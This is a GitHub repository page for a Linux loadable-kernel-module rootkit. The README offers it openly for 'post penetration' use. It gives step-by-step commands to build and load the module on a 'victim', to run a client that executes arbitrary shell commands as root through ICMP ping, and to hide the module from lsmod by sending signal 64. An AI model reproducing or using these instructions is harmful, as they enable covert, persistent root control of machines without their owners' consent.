Skip to content
/ linux-rootkit Public

Remote Linux Loadable Kernel Module (LKM) rootkit (For Linux Kernels 5.x). Shell command execution by ping.

License

MIT license
20 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Zhang1933/linux-rootkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
.github/workflows
.github/workflows
 
 
client
client
 
 
server
server
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Magic ping - shell execution

Action Check Compiling

Ping - ICMPv4 License - MIT Security - Post penetration

Tested on - 5.4.0-109-generic #123-Ubuntu x86_64 GNU/Linux Tested on - 5.13.0-40-generic #45~20.04.1-Ubuntu x86_64 GNU/Linux

Features:

  • Romete shell command execution by ping.
  • Hiding (or Showing) Kernel Module from Userspace.

Asciinema Demo

asciicast

Compile

compile server(victim) kernel module:

cd server && make

Client(attacker):

cd client && make

Romete server (victim):

sudo insmod server.ko

Local attacker:

Need root privilege to send icmp packets for ping.

sudo ./client <victim ip address>

Then you can let remote victim execute whatever shell command you input as root privilege (some command may need full path).

Hide(Show) remote kernel module:

Send signal 64 to show or hide:

kill -64 1

Use lsmod to check.

Thanks && Reference:

About

Remote Linux Loadable Kernel Module (LKM) rootkit (For Linux Kernels 5.x). Shell command execution by ping.

Topics

c security icmp-ping post-penetration linux-loadable-kernel-module

Resources

Readme

License

MIT license
Activity

Stars

20 stars

Watchers

3 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages